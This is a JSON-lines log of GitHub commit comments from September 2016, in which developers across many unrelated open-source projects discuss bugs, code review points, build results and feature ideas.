{"id":"4545959433","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18977239,"position":null,"line":null,"path":null,"commit_id":"d59298a56c7b30403e0db0682f4d8f01b270c39b","created_at":"2016-09-11T15:03:17Z","updated_at":"2016-09-11T15:03:17Z","body":"i'm creating a small db with firmware info to be used by a script to\ndetermine what firmware files are to be deleted for a specific kernel\nversion. specially for 3.14 at the moment, so the next slacko32 alpha\nwill be smaller. it will take some time to make it a bit generic. need\nlots of info that probably is not that easy to get or to put into\nsomething usable.\n\nsomething like this:\nhttp://pastebin.com/Sjnm63v0\n"}},"created_at":"2016-09-11T15:03:17Z"}
{"id":"4545960222","type":"CommitCommentEvent","actor":{"login":"limjh16"},"repo":{"name":"TipsyOs/frameworks_opt_telephony"},"payload":{"comment":{"id":18977242,"position":null,"line":null,"path":null,"commit_id":"76d3e8f11fc84f198f2abbebd9195920336abc56","created_at":"2016-09-11T15:03:48Z","updated_at":"2016-09-11T15:03:48Z","body":"Sorry, I'm new to these stuff, I thought that by pushing it others can help\nto test too...\n\nOn Sun, 11 Sep 2016, 10:56 PM Alx31 <notifications@github.com> wrote:\n\n> next time please push only AFTER u've built and tested commits, thanks.\n> Especially when commits are already there....bde243f\n> <https://github.com/TipsyOs/frameworks_opt_telephony/commit/bde243f026ec8bf549e26386d7c275b80254fffe>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TipsyOs/frameworks_opt_telephony/commit/76d3e8f11fc84f198f2abbebd9195920336abc56#commitcomment-18977212>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOeibJ-Tk06ACVwgZwJ7x9Lb7RR7UYb_ks5qpBacgaJpZM4J5_j5>\n> .\n>\n"}},"created_at":"2016-09-11T15:03:48Z"}
{"id":"4545961398","type":"CommitCommentEvent","actor":{"login":"euwbah"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":18977244,"position":null,"line":null,"path":null,"commit_id":"33c929ccde52f3854450e85c628c53e2c5a3f139","created_at":"2016-09-11T15:04:37Z","updated_at":"2016-09-11T15:04:37Z","body":"Hi! Well, I had this idea but I'm not sure whether it was a feasible one. What if the files are split into two categories, static code, and 'live' code (pun not intended)? Perhaps this would allow for something like a modular framework, where one can import static huge files for use in the current session, and there won't be any performance issues caused by this huge file, because it won't be in the editor. Simple concatenation of the files would do the trick, and let the code be concatenated with each run.\r\nThis is actually no different in concept than simply editing the Sonic Pi server's source itself, other than the fact that Sonic Pi itself would have an interface for doing so.\r\n\r\nI've only just recently started trying to understand internals of Sonic Pi, so I can't say much, but as a musician, I feel that huge files aren't only just for composing entire symphonies, but there are a lot of things in music that are indeed 'algorithmic' in nature, in one way or another, but these can't be expressed within the file size constraints. Personally, I've always tried to create functions which reflect these algorithms (melodic development, automated articulation and phrasing, automated motifs over different chords, rhythmic evolution, Bebop-style soloing), but I end up hitting a glass ceiling, well at least until this particular commit.\r\n\r\nImho, I feel that having no file size limits, even in a theoretical sense, would definitely redefine the limits of live coding, and ideally, be the epitome of natural and artificial intelligence working hand-in-hand to create beautiful music, especially with STEAM becoming a thing around the world :)\r\nThis is especially powerful in the context of Sonic Pi, because it is, thus far, the most efficient live-coding platform ever.\r\n\r\nAnyways, I wish Sonic Pi the best of luck, and I'll definitely try to see if something can be done about this file size issue once I get the hang of how Sonic Pi works :grin: "}},"created_at":"2016-09-11T15:04:37Z"}
{"id":"4545962668","type":"CommitCommentEvent","actor":{"login":"AlexIIL"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18977247,"position":8,"line":5,"path":"api/buildcraft/api/enums/EnumLaserTableType.java","commit_id":"e0cd96e1daf0d2d4319958716eaf7bc7f45f317d","created_at":"2016-09-11T15:05:24Z","updated_at":"2016-09-11T15:05:24Z","body":"The blockstate property or the MjConnectorType?"}},"created_at":"2016-09-11T15:05:24Z"}
{"id":"4545964071","type":"CommitCommentEvent","actor":{"login":"vsalaman"},"repo":{"name":"jpos/jPOS"},"payload":{"comment":{"id":18977248,"position":null,"line":null,"path":null,"commit_id":"8a12c1870b469d3d12c281d3f0105c33bfec6185","created_at":"2016-09-11T15:06:15Z","updated_at":"2016-09-11T15:06:15Z","body":"demsey, legacy reasons... That code is from 1999."}},"created_at":"2016-09-11T15:06:15Z"}
{"id":"4545966269","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18977249,"position":null,"line":null,"path":null,"commit_id":"39e23db73719c5c55e58d80f183bb64aa75f0540","created_at":"2016-09-11T15:07:34Z","updated_at":"2016-09-11T15:07:34Z","body":"I would hesitate to add this option for Linux until scheduler is much more effective here. Under Windows it works much worse and even one application which uses all cores can slow down the system too much. \r\nBy the way under Linux you can run application using \"nice\" command. "}},"created_at":"2016-09-11T15:07:34Z"}
{"id":"4545967659","type":"CommitCommentEvent","actor":{"login":"johnheenan"},"repo":{"name":"johnheenan/libgda"},"payload":{"comment":{"id":18977252,"position":null,"line":null,"path":null,"commit_id":"2a5068a851c2cd80619d3f8f905282f1399fb0c4","created_at":"2016-09-11T15:08:23Z","updated_at":"2016-09-11T15:08:23Z","body":"A few clicks of next button for the SimpleUIForm example and the 'Same Data' demo of gdaui-demo shows combo updates are not occurring in both libgda-6.0 (libgda master branch) and libgda-5.0 (LIBGDA_5.2 branch).\r\n\r\nThis change fixes the bug.\r\n\r\nBug details reported at https://bugzilla.gnome.org/show_bug.cgi?id=771132"}},"created_at":"2016-09-11T15:08:23Z"}
{"id":"4545969534","type":"CommitCommentEvent","actor":{"login":"iShinobu"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":18977256,"position":null,"line":null,"path":null,"commit_id":"20de8b9c4efd754bf53a8d17f08e1bf331fb3541","created_at":"2016-09-11T15:09:30Z","updated_at":"2016-09-11T15:09:30Z","body":"• Canaan\r\n• Gyakkyou Burai Kaiji: Ultimate Survivor\r\n• Hanasaku Iroha\r\n• Kamisama no Memochou\r\n• Kanon (2006)\r\n• Kuroko no Basket 3rd Season\r\n• Maburaho\r\n• Mainichi Kaasan\r\n• Michiko to Hatchin\r\n• No Game No Life Specials\r\n• Shirobako\r\n• Smile Precure!\r\n• Sore ga Seiyuu!\r\n• Space☆Dandy\r\n• Triage X\r\n• Uchouten Kazoku"}},"created_at":"2016-09-11T15:09:30Z"}
{"id":"4545969615","type":"CommitCommentEvent","actor":{"login":"bitbandi"},"repo":{"name":"CryptoCoderz/Espers"},"payload":{"comment":{"id":18977257,"position":null,"line":null,"path":null,"commit_id":"e8c1b49a1257b8054156e2251cf3f243e91ec14c","created_at":"2016-09-11T15:09:33Z","updated_at":"2016-09-11T15:09:33Z","body":"use this: \r\nhttps://github.com/CryptoCoderz/Espers/blob/127da4741d64f3a627495237652a5b1804466371/share/seeds/generate-seeds.py"}},"created_at":"2016-09-11T15:09:33Z"}
{"id":"4545971117","type":"CommitCommentEvent","actor":{"login":"markjcrane"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18977259,"position":null,"line":null,"path":null,"commit_id":"232cc73eb3a483538e3013bfedd2438eca6249ff","created_at":"2016-09-11T15:10:22Z","updated_at":"2016-09-11T15:10:22Z","body":"Thanks for reporting this it has been fixed."}},"created_at":"2016-09-11T15:10:22Z"}
{"id":"4545971502","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18977261,"position":9,"line":7,"path":"test/parallel/test-intl.js","commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-11T15:10:36Z","updated_at":"2016-09-11T15:10:36Z","body":"Optional: This may start to get outside the scope of a simple change, so feel free to ignore, but if you want, you might try to track down under what circumstances `process.config.variables.v8_enable_i18n_support` will be `undefined` as opposed to `0` and tighten up the test based on that information. It's entirely possible the `undefined` check is here to accommodate old versions of V8 that Node.js no longer ships with, or maybe it's there to accommodate ChakraCore. However, figuring that out would require some combination of:\r\n\r\n* using `git blame` or other `git` tools to figure out when it was added and why\r\n* perhaps contacting a knowledgable Intl person (srl295 on IRC is probably the most knowledgable person)\r\n* perhaps contacting the Intl Working Group to figure out what's up: https://github.com/nodejs/Intl\r\n\r\nThis might be too much to do right now, but it could be a candidate for a second contribution if the Intl stuff is something you wouldn't mind digging a little deeper into. Up to you."}},"created_at":"2016-09-11T15:10:36Z"}
{"id":"4545971530","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18977262,"position":null,"line":null,"path":null,"commit_id":"59cb3b4fa1dc1b9679a50ca54214301b67d679b6","created_at":"2016-09-11T15:10:37Z","updated_at":"2016-09-11T15:10:37Z","body":"the mapping in our makefile is pretty arbitrary and shouldn't be visible elsewhere. I don't want to add extra work on the buildbots either, since that would have to be duplicated by anyone building custom versions of julia."}},"created_at":"2016-09-11T15:10:37Z"}
{"id":"4545971571","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977263,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T15:10:38Z","updated_at":"2016-09-11T15:10:38Z","body":"Nod, yes I know these kinds of changes are a pain.\n\nOn Sep 11, 2016 5:07 PM, \"Alex Hultman\" <notifications@github.com> wrote:\n\n> Point is, Primus is already an established project and I guess they are\n> not going to break their own interface just because one transformer decides\n> to deviate 😸\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uWebSockets/uWebSockets/commit/56abcced914497e1fc4fe24304b86564bc4aca8d#commitcomment-18977203>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGQZ0vmdiD_-XBeq0pyHtPDeNAj6waH4ks5qpBYSgaJpZM4J6Ao6>\n> .\n>\n"}},"created_at":"2016-09-11T15:10:38Z"}
{"id":"4545974523","type":"CommitCommentEvent","actor":{"login":"SilentSpike"},"repo":{"name":"acemod/ACE3"},"payload":{"comment":{"id":18977265,"position":70,"line":70,"path":"addons/cookoff/functions/fnc_detonateAmmunition.sqf","commit_id":"b63cf25ff4530ccb6b18e3d7a6300e0bab389387","created_at":"2016-09-11T15:12:24Z","updated_at":"2016-09-11T15:12:24Z","body":"These speed calculations could probably be updated to just use the array form of `random`. A gaussian distribution should be acceptable (probably more realistic too - not that anyone would ever notice)."}},"created_at":"2016-09-11T15:12:24Z"}
{"id":"4545974764","type":"CommitCommentEvent","actor":{"login":"markjcrane"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18977266,"position":null,"line":null,"path":null,"commit_id":"5658dc27c40125be99e5bbc05103a0b99d21ead7","created_at":"2016-09-11T15:12:34Z","updated_at":"2016-09-11T15:12:34Z","body":"We update the year when the file has been changed this code was likely changed in 2016 and definitely in 2015. Will be updating it again for the next version so will worry about it then."}},"created_at":"2016-09-11T15:12:34Z"}
{"id":"4545980427","type":"CommitCommentEvent","actor":{"login":"zaxlct"},"repo":{"name":"2remote/yaopai-mobile"},"payload":{"comment":{"id":18977270,"position":37,"line":33,"path":"app/components/WorkPage/PriceTag.js","commit_id":"c589624bb48ead90dddf23f92a3fdd09b0002365","created_at":"2016-09-11T15:15:51Z","updated_at":"2016-09-11T15:15:51Z","body":"```\r\n let priceDiv = priceList.map((data, i) => (\r\n   <div></div>\r\n)\r\n\r\n```\r\n直接这样就行了"}},"created_at":"2016-09-11T15:15:51Z"}
{"id":"4545981237","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":18977273,"position":5,"line":14,"path":"resource/source-python/translations/_core/hooks_strings.ini","commit_id":"3113e770a9ec3a71f7f1df5d42b87b674ed09c6a","created_at":"2016-09-11T15:16:18Z","updated_at":"2016-09-11T15:16:18Z","body":"Note the space, is it needed? There's none in other languages."}},"created_at":"2016-09-11T15:16:18Z"}
{"id":"4545982278","type":"CommitCommentEvent","actor":{"login":"bgrainger"},"repo":{"name":"bgrainger/Pomelo.EntityFrameworkCore.MySql"},"payload":{"comment":{"id":18977274,"position":null,"line":null,"path":null,"commit_id":"0e2a88a0612f439a9414d6b997b795ec77bc5a09","created_at":"2016-09-11T15:16:50Z","updated_at":"2016-09-11T15:16:50Z","body":"Note: for compatibility with MySql.Data, MySqlConnector will return a `string` from `MySqlDataReader.GetValue` for `JSON` columns. So this may need to be changed to cast from `string` instead of `byte[]`?"}},"created_at":"2016-09-11T15:16:50Z"}
{"id":"4545982641","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":18977275,"position":5,"line":14,"path":"resource/source-python/translations/_core/plugin_strings.ini","commit_id":"3113e770a9ec3a71f7f1df5d42b87b674ed09c6a","created_at":"2016-09-11T15:17:02Z","updated_at":"2016-09-11T15:17:02Z","body":"`'{plugin}...'` should really be `'{plugin}'...`"}},"created_at":"2016-09-11T15:17:02Z"}
{"id":"4545984124","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18977276,"position":null,"line":null,"path":null,"commit_id":"39e23db73719c5c55e58d80f183bb64aa75f0540","created_at":"2016-09-11T15:17:49Z","updated_at":"2016-09-11T15:17:49Z","body":"i agree, in total there is not much to gain with playing around with the priority.\r\nThe program is in general consuming efficiently way above 90% of cpu. Making it more higher prio, it can just slow down other critical programs (or they would not run next to the rendering in the first place).\r\nOn the other way I see the only useful usecase in lowering the priority of mandelbulber, to let other programs take cpu times, which are marked as lowprio, but are in fact critical.\r\nBut again IMHO this should only be a rare case."}},"created_at":"2016-09-11T15:17:49Z"}
{"id":"4545985060","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18977279,"position":null,"line":null,"path":null,"commit_id":"f8f6d38931b4a1696f0825302d14a2e2afc6c4a7","created_at":"2016-09-11T15:18:22Z","updated_at":"2016-09-11T15:18:22Z","body":"hmm, I tried setting it to positive on mine but it actually increased the force cost instead of decreasing it. I'm wondering if it's because these are used in crafting and are not actual crystals that makes the difference?"}},"created_at":"2016-09-11T15:18:22Z"}
{"id":"4545986145","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18977280,"position":null,"line":null,"path":null,"commit_id":"a9505a603e02673512347ac8b325b6d36572c5cd","created_at":"2016-09-11T15:18:57Z","updated_at":"2016-09-11T15:18:57Z","body":"I wanted to fix bugs and install issues and close out the PRs, but we should ship no later than the end of next week."}},"created_at":"2016-09-11T15:18:57Z"}
{"id":"4545988174","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"OpeningDesign/FreeMVD_WorkFlow"},"payload":{"comment":{"id":18977283,"position":null,"line":null,"path":null,"commit_id":"71c31ec59c92f3bb90e55603bbacd9ec38149840","created_at":"2016-09-11T15:20:04Z","updated_at":"2016-09-11T15:20:04Z","body":"@yorikvanhavre unfortunately, this didn't work upon revit import."}},"created_at":"2016-09-11T15:20:04Z"}
{"id":"4545990065","type":"CommitCommentEvent","actor":{"login":"koquantam"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18977286,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T15:21:08Z","updated_at":"2016-09-11T15:21:08Z","body":"But be caution. Installing GAPPS could make SetupWizard FC. This has already existed since CM12.1"}},"created_at":"2016-09-11T15:21:08Z"}
{"id":"4545993947","type":"CommitCommentEvent","actor":{"login":"naskomit"},"repo":{"name":"selectize/selectize.js"},"payload":{"comment":{"id":18977293,"position":null,"line":null,"path":null,"commit_id":"6ded59dcd1346fe577717ac46d1d8e7a3660fb03","created_at":"2016-09-11T15:23:27Z","updated_at":"2016-09-11T15:23:27Z","body":"`jQuery.fn.removeHighlight` must be `$.fn.removeHighlight`. The first one only works if a global jQuery is present."}},"created_at":"2016-09-11T15:23:27Z"}
{"id":"4545998810","type":"CommitCommentEvent","actor":{"login":"LewsTherin2010"},"repo":{"name":"LewsTherin2010/ludullus"},"payload":{"comment":{"id":18977299,"position":null,"line":null,"path":null,"commit_id":"554862701019a99991b0939864efc4f01fb99d84","created_at":"2016-09-11T15:26:26Z","updated_at":"2016-09-11T15:26:26Z","body":"I used these commands (http://stackoverflow.com/questions/2763006/change-the-current-branch-to-master-in-git) to switch the content of the master and the newmaster branches."}},"created_at":"2016-09-11T15:26:26Z"}
{"id":"4545999086","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18977300,"position":null,"line":null,"path":null,"commit_id":"c6cf109ef9fabfc88cd363869c6f5a936524d90d","created_at":"2016-09-11T15:26:39Z","updated_at":"2016-09-11T15:26:39Z","body":"Yes, please put it back to `piecewise` and remove the `value` call.  `value` is much too crude (I had missed that!).  I recently made that same mistake myself.\r\n\r\nThe problem with `value` is that it indiscriminately evaluates everything in sight - which is rarely, if ever, what we want in a programmatic context.  We want more control, to get more predictability."}},"created_at":"2016-09-11T15:26:39Z"}
{"id":"4545999142","type":"CommitCommentEvent","actor":{"login":"gzoller"},"repo":{"name":"gzoller/ScalaJack"},"payload":{"comment":{"id":18977301,"position":null,"line":null,"path":null,"commit_id":"fc7d9190cc6aa2938126dfb8d5f8840ed7991a6b","created_at":"2016-09-11T15:26:41Z","updated_at":"2016-09-11T15:26:41Z","body":"Not finished here.  Have basic overrides working (I think) for primitives and value classes.  Working to redo the associated tests but still have a few odd bugs to work thru.\r\n\r\nRemoved the non-canonical tests as I don't think V5 will support this feature.  (Instead, later I think it will render the non-canonical pieces in a canonical way, e.g. render non-String object key as a String).  That should also cut down on some non-passing tests we (for now) don't care about."}},"created_at":"2016-09-11T15:26:41Z"}
{"id":"4545999475","type":"CommitCommentEvent","actor":{"login":"Gnimuc"},"repo":{"name":"Gnimuc/GCoptimization.jl"},"payload":{"comment":{"id":18977302,"position":null,"line":null,"path":null,"commit_id":"bbf399c643c50736c81f633a8f995188bb036925","created_at":"2016-09-11T15:26:53Z","updated_at":"2016-09-11T15:26:53Z","body":"deps.jl was not correctly generated.\r\nref: [deps.jl files created when installation fails](https://github.com/JuliaLang/BinDeps.jl/issues/100)."}},"created_at":"2016-09-11T15:26:53Z"}
{"id":"4545999640","type":"CommitCommentEvent","actor":{"login":"jimdowling"},"repo":{"name":"karamelchef/karamel"},"payload":{"comment":{"id":18977303,"position":null,"line":null,"path":null,"commit_id":"9cb6e87fa7e0a86268b3d3c085203ded4fb2d6aa","created_at":"2016-09-11T15:27:00Z","updated_at":"2016-09-11T15:27:00Z","body":"@kamalhakim . This  compiles and the 'find-os-type.sh' works. However, all operations after that fail. They don't copy over the shell scripts for the tasks. Can you please test this - i will be demonstrating on Tuesday now, got moved from Monday."}},"created_at":"2016-09-11T15:27:00Z"}
{"id":"4546002975","type":"CommitCommentEvent","actor":{"login":"AliasT"},"repo":{"name":"AliasT/react-a"},"payload":{"comment":{"id":18977310,"position":18,"line":18,"path":"components/in-theaters/index.tsx","commit_id":"fe242cca3e72ce73db1ef0e808259780dc47f8fd","created_at":"2016-09-11T15:28:51Z","updated_at":"2016-09-11T15:28:51Z","body":"ts的强类型怎么用还得多尝试"}},"created_at":"2016-09-11T15:28:51Z"}
{"id":"4546003349","type":"CommitCommentEvent","actor":{"login":"AliasT"},"repo":{"name":"AliasT/react-a"},"payload":{"comment":{"id":18977311,"position":18,"line":18,"path":"components/in-theaters/index.tsx","commit_id":"fe242cca3e72ce73db1ef0e808259780dc47f8fd","created_at":"2016-09-11T15:29:04Z","updated_at":"2016-09-11T15:29:04Z","body":"ts的强类型怎么用还得多尝试"}},"created_at":"2016-09-11T15:29:04Z"}
{"id":"4546006405","type":"CommitCommentEvent","actor":{"login":"BobRyan530"},"repo":{"name":"thopiekar/Cura"},"payload":{"comment":{"id":18977313,"position":null,"line":null,"path":null,"commit_id":"02fd71fe58154bb46d5deba413b26c8c385e45ab","created_at":"2016-09-11T15:30:42Z","updated_at":"2016-09-11T15:30:42Z","body":"Thanks Thomas,\r\n\r\nI can confirm the workaround works for your 2.3 PPA. I'm having other problems with it (CuraEngine errors on missing libArcus.so.2, symlinking libArcus.so.3 to it causes a segfault) and I'm not sure where best to report this.\r\n\r\n-Bob"}},"created_at":"2016-09-11T15:30:42Z"}
{"id":"4546007688","type":"CommitCommentEvent","actor":{"login":"terrillmoore"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":18977314,"position":null,"line":null,"path":null,"commit_id":"6cc4e21bf5e304a40e3a01edd4e4ca751c8f95ea","created_at":"2016-09-11T15:31:30Z","updated_at":"2016-09-11T15:31:30Z","body":"OK. I would like to keep this code generic beyond TTN, but I’d also like it to be easy to use with TTN.\r\n\r\nI think I’ll add\r\n\r\n`enum { LMIC_SUBBAND_1 = 0, …. LMIC_SUBBAND_8 };`\r\n\r\nto lmic.h, and then we can \r\n\r\n`#define TTN_DEFAULT_SUBBAND \tLMIC_SUBBAND_2`\r\n\r\nin code that is targeting TTN. Anyway, I think the selection of the \"subband\" is a network-specific configuration which should ultimately be refactored into the project_config stuff where we already select the target band / regulatory env (along with per-board configuration details).\r\n\r\n(Makes me think we should have pre-canned sub-include files for \"network\" and \"board\" that can be included from the project_config directory.)\r\n"}},"created_at":"2016-09-11T15:31:30Z"}
{"id":"4546008879","type":"CommitCommentEvent","actor":{"login":"Coldwindofnowhere"},"repo":{"name":"Coldwindofnowhere/android_device_samsung_aries-common"},"payload":{"comment":{"id":18977315,"position":null,"line":null,"path":null,"commit_id":"83eaf92431293bc1ce7e773a62ddd5f688a29e5e","created_at":"2016-09-11T15:32:13Z","updated_at":"2016-09-11T15:32:13Z","body":"Yes, it _seems_ to work just fine now, I don't have this issue anymore and I haven't recived any complain about it. \r\n"}},"created_at":"2016-09-11T15:32:13Z"}
{"id":"4546009462","type":"CommitCommentEvent","actor":{"login":"LewsTherin2010"},"repo":{"name":"LewsTherin2010/ludullus"},"payload":{"comment":{"id":18977316,"position":null,"line":null,"path":null,"commit_id":"554862701019a99991b0939864efc4f01fb99d84","created_at":"2016-09-11T15:32:33Z","updated_at":"2016-09-11T15:32:33Z","body":"SOOO, this commit does not include any work from the multiprocessing branch, even though the graph looks like it does. I found a series of commands on stackoverflow (http://stackoverflow.com/questions/2763006/change-the-current-branch-to-master-in-git) that showed how to make a branch into the master, and that's just how the graph ended up looking."}},"created_at":"2016-09-11T15:32:33Z"}
{"id":"4546009822","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18977317,"position":null,"line":null,"path":null,"commit_id":"c3f0b692bbd5c7f846628facfd0f344aeb09831b","created_at":"2016-09-11T15:32:46Z","updated_at":"2016-09-11T15:32:46Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 428](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1185&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-11T15:32:46Z"}
{"id":"4546012536","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18977318,"position":null,"line":null,"path":null,"commit_id":"c3f0b692bbd5c7f846628facfd0f344aeb09831b","created_at":"2016-09-11T15:34:22Z","updated_at":"2016-09-11T15:34:22Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 428](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1185&buildTypeId=XbimEssentials_XbimEssentials) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:36"}},"created_at":"2016-09-11T15:34:22Z"}
{"id":"4546013576","type":"CommitCommentEvent","actor":{"login":"GuneetAtwal"},"repo":{"name":"GuneetAtwal/kenzo"},"payload":{"comment":{"id":18977319,"position":null,"line":null,"path":null,"commit_id":"003125dbbba200cc661a28de87c3bf0ba87b0812","created_at":"2016-09-11T15:35:01Z","updated_at":"2016-09-11T15:35:01Z","body":"btw o3 build and dsync has no connection , i don't see how it can cause random reboots"}},"created_at":"2016-09-11T15:35:01Z"}
{"id":"4546014068","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"bgrainger/Pomelo.EntityFrameworkCore.MySql"},"payload":{"comment":{"id":18977321,"position":null,"line":null,"path":null,"commit_id":"0e2a88a0612f439a9414d6b997b795ec77bc5a09","created_at":"2016-09-11T15:35:14Z","updated_at":"2016-09-11T15:35:14Z","body":"Thanks for the heads up, I'll make sure it can also cast from a string"}},"created_at":"2016-09-11T15:35:14Z"}
{"id":"4546017959","type":"CommitCommentEvent","actor":{"login":"danieljimenez"},"repo":{"name":"jason0x43/jc-nest"},"payload":{"comment":{"id":18977324,"position":null,"line":null,"path":null,"commit_id":"2ba488371d79064d40c1b1099d371666e3cab8a2","created_at":"2016-09-11T15:37:29Z","updated_at":"2016-09-11T15:37:29Z","body":"Wow. \r\nMuch thanks.\r\nSuch Update.\r\nVery Open Source.\r\n👍👍🏻👍🏼👍🏽👍🏾👍🏿"}},"created_at":"2016-09-11T15:37:29Z"}
{"id":"4546018198","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"GuneetAtwal/kenzo"},"payload":{"comment":{"id":18977325,"position":null,"line":null,"path":null,"commit_id":"003125dbbba200cc661a28de87c3bf0ba87b0812","created_at":"2016-09-11T15:37:38Z","updated_at":"2016-09-11T15:37:38Z","body":"'-Wno-maybe-uninitialized'\r\n\r\nWhen doing fsync operation writing to some 0xADDRESS in 64bit format (0xXXXXXXXXXXXXXXXX), wrong offset addressing."}},"created_at":"2016-09-11T15:37:38Z"}
{"id":"4546018939","type":"CommitCommentEvent","actor":{"login":"marknl"},"repo":{"name":"AbuseIO/AbuseIO"},"payload":{"comment":{"id":18977326,"position":null,"line":null,"path":null,"commit_id":"ef2aa0654b60560b94c848c35b37cd8610f2a170","created_at":"2016-09-11T15:38:03Z","updated_at":"2016-09-11T15:38:03Z","body":"I would've done this a bit differently. (I'm currently working on using \"setUp()\" for each unit test to setup dummy data to test with. This way the tests don't have to use supposibly seeded data. The only exception is that ther MUST be a user with id=1 (admin). But that's always seeded."}},"created_at":"2016-09-11T15:38:03Z"}
{"id":"4546019482","type":"CommitCommentEvent","actor":{"login":"hxxr"},"repo":{"name":"firebolt55439/Diep.io-Protocol"},"payload":{"comment":{"id":18977327,"position":null,"line":null,"path":null,"commit_id":"e39e80f5275fbb890de6a8c3f9153748da711669","created_at":"2016-09-11T15:38:24Z","updated_at":"2016-09-11T15:38:24Z","body":"I added some info on death detection on the wiki [here.](https://github.com/firebolt55439/Diep.io-Protocol/wiki/Server-Packets#death)"}},"created_at":"2016-09-11T15:38:24Z"}
{"id":"4546019638","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18977328,"position":null,"line":null,"path":null,"commit_id":"dc9f446f6276e966dbd9f7a36e21594707156214","created_at":"2016-09-11T15:38:29Z","updated_at":"2016-09-11T15:38:29Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 429](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1186&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-11T15:38:29Z"}
{"id":"4546021221","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977332,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T15:39:27Z","updated_at":"2016-09-11T15:39:27Z","body":"Eh, I need to test  this some more. Will see how I do about it, so there's no need to make any Primus changes yet."}},"created_at":"2016-09-11T15:39:27Z"}
{"id":"4546021718","type":"CommitCommentEvent","actor":{"login":"davidzwa"},"repo":{"name":"damienallen/ds4reboot"},"payload":{"comment":{"id":18977333,"position":null,"line":null,"path":null,"commit_id":"766448eed3447dc087f832827a1958f56c617074","created_at":"2016-09-11T15:39:45Z","updated_at":"2016-09-11T15:39:45Z","body":"Also minor edits to views.py. Removed eating_with template tag."}},"created_at":"2016-09-11T15:39:45Z"}
{"id":"4546022067","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18977334,"position":null,"line":null,"path":null,"commit_id":"dc9f446f6276e966dbd9f7a36e21594707156214","created_at":"2016-09-11T15:39:58Z","updated_at":"2016-09-11T15:39:58Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 429](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1186&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:29"}},"created_at":"2016-09-11T15:39:58Z"}
